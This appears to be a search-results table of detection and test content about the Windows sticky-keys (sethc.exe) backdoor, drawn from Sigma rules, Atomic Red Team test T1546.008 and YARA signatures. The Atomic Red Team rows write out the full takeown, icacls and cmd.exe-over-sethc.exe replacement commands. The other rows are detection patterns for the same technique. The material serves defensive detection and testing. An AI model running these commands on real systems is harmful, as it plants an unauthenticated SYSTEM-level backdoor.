| sigma |
proc_creation_win_install_reg_debugger_backdoor.yml |
- 'sethc.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_stickykey_like_backdoor.yml |
- 'sethc.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml |
CommandLine: 'copy /y C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe' |
DRL 1.0 |
| sigma |
registry_event_stickykey_like_backdoor.yml |
- '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger' |
DRL 1.0 |
| atomic-red-team |
T1546.008.md |
Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as “sticky keys”, and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
| parent_list | Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: “osk.exe” | String | osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
Replace sticky keys binary (sethc.exe) with cmd.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
takeown /F C:\Windows\System32\sethc.exe /A |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1546.008.md |
copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe |
MIT License. © 2018 Red Canary |
| signature-base |
cn_pentestset_scripts.yar |
$s1 = “success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| “ ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
description = “Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe” |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
description = “Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe” |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
description = “Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe” |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s2 = “\dllcache\sethc.exe” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s2 = “\sethc.exe /G everyone:F” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s1 = “\sethc.exe /G everyone:F” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s3 = “\dllcache\sethc.exe” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s3 = “\sethc.exe /G everyone:F” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base |
thor_inverse_matches.yar |
description = “Sethc.exe has been replaced - Indicates Remote Access Hack RDP” |
CC BY-NC 4.0 |
| signature-base |
thor_inverse_matches.yar |
$s4 = “SETHC.EXE” wide fullword |
CC BY-NC 4.0 |
| signature-base |
thor_inverse_matches.yar |
filename == “sethc.exe” |
CC BY-NC 4.0 |